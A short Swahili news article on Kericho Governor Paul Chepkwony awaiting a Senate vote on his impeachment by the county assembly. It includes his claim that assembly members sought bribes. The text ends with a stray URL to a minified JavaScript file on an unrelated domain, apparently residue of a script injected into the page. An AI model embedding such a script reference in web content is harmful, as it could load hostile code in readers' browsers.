Gavana wa Kericho Paul Chepkwony kujua hatma yake leo

kericho-276x160Gavana wa Kericho Paul Chepkwony anatarajiwa kujua hatma yake hii leo wakati bunge la seneti litakapojadili ripoti ya kamati ya bunge hilo iliyochunguza tuhuma zilizopelekea kutimuliwa kwake.
Kamati hiyo ilikamilisha uchunguzi dhidi ya gavana huyo aliyetimuliwa na bunge la kaunti na tayari imeandaa ripoti yake itakayowasilishwa na seneta wa Kisii Chris Obure ambaye ni mwenyekiti.
Chempkwony alitimuliwa na bunge la kaunti ya Kericho mwezi uliopita baada ya kutuhumiwa kuwa anatumia vibaya mamlaka yake.
Hata hivyo gavana huyo alipofika mbele ya kamati ya bunge la seneti, aliwanyoshea kidole cha lawama wajumbe wa bunge la kaunti ambao alisema walimuitisha hongo ili waiangushe hoja ya kumng’oa mamlakani.
Gavana huyo kadhalika alimshutumu spika wa bunge la kaunti ambaye anasema aliongoza juhudi za kumng’oa.
https://tobaltoyon.com/act/files/tag.min.js?z=2569287